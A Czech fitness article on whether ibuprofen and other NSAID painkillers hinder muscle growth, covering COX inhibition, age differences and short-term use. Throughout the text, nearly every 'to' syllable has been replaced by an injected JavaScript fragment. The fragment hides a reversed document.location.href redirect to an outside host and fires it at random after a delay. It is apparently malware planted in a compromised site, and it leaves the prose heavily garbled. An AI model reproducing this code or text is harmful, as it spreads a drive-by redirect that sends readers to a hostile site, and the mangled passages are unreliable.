Výživa

MOHOU LÉKY NA BOLEST NARUŠIT BUDOVÁNÍ HMOTY?

Dáte si někdy při tréninku tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolik do těla, že druhý den ráno autobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomaticky sáhnete po růžové záchraně v podobě oblíbeného léku na bolest? A napadlo vás někdy, že tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to nemusí prospívat nárůstu svalů?

Nejspíš jste se nad tím nikdy nezamýšleli a bolest byla natobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolik silná, že jste s pilulkou v ruce nezaváhali ani okamžik. Co kdyby vám ale někdo řekl, že když tu bolest vydržíte nebo utlumíte nějakým jiným prostředkem, dosáhnete lepších výsledků?

Sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovci všech úrovní používají volně prodejné nesteroidní protizánětlivé léky překvapivě častobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to. Nejpopulárnější účinnou látkou je bezesporu ibuprofen, skýtající nejenom úlevu od bolesti, ale také možnost utlumit zánětlivé procesy.

Již v roce 2017 ovšem vědci ze švédského Institutu Karolinska uzavřeli svou studii zabývající se vlivem užívání ibuprofenu na skeletální svalstvo s tím, že dlouhodobé užívání volně prodejných protizánětlivých léků může inhibovat růst svalů u mladých, zdravých sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovců, věnujících se pravidelně posilovacímu tréninku.

 

tobor-latigid//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-7-200×300.jpg“ alt=““ width=“200″ height=“300″ />TLUMÍ BOLEST vs. NARUŠUJÍ SYNTÉZU BÍLKOVIN

Kromě již známých vedlejších účinků, mezi něž patří především gastrointestinální obtíže, představuje užívání zmiňovaných léků riziko i z hlediska sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovní výkonnosti a tréninkového progresu. Léky na bázi ibuprofenu patří mezi tzv. COX inhibitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory, přičemž COX aktivita je zásadní pro hypertrofii svalů. z tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toho plyne jednoznačný závěr – léky potlačující COX aktivitu jsou z pohledu budování svalové hmoty kontraproduktivní.

Vědci provedli za poslední roky celou řadu studií na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to téma. Některé z nich uvedené informace potvrzují, jiné jsou shovívavější. Je ale třeba vzít v potaz, že řada výzkumů pracuje s nesportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovci, což výsledek značně zkresluje.

 

ZÁNĚT JAKO PŘÍNOS? ZÁLEŽÍ NA VĚKU

Biopsie svalů u sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovců užívajících pravidelně protizánětlivé léky prokázala pokles zánětlivých markerů. Současně ale sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovci čelí poklesu síly. Odborníci protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to odhadují, že zánětlivé procesy mohou být v návaznosti na posilovací trénink mladších sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovců přínosné ve smyslu rozvoje nové svalové hmoty. Mladí lidé, kteří pravidelně posilují, aby nabrali svaly, by se tedy pravidelnému podávání vysokých dávek protizánětlivých léků měli vyhnout.

Naproti tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu studie provedené u starší populace prokazují, že protizánětlivé léky mohou zabránit úbytku svalové hmoty způsobené stárnutím. Vědci se protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to domnívají, že mechanismus regulace množství svalové hmoty je jiný u mladších a starších sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovců.

 

UŽÍVÁNÍ LÉKŮ – ANO ČI NE?

Není pochyb, že existují situace, kdy má užívání léků na bolesti a proti zánětům svoje opodstatnění. Ale vždy byste k nim měli přistupovat obezřetně, nepřehánět tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to s dávkami a léky brát krátkodobě. Sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovní lékaři je většinou doporučují při akutních zraněních, jako je natažení, či natržení vazu nebo svalu a při zánětech šlach. Délka užívání by přitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom měla být co nejkratší.

Sáhnout po záchranné pilulce z důvodu potréninkových bolestí namožených svalů tím pádem není nejlepší nápad. Vašim snahám o nárůst svalové hmoty tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to rozhodně neprospívá.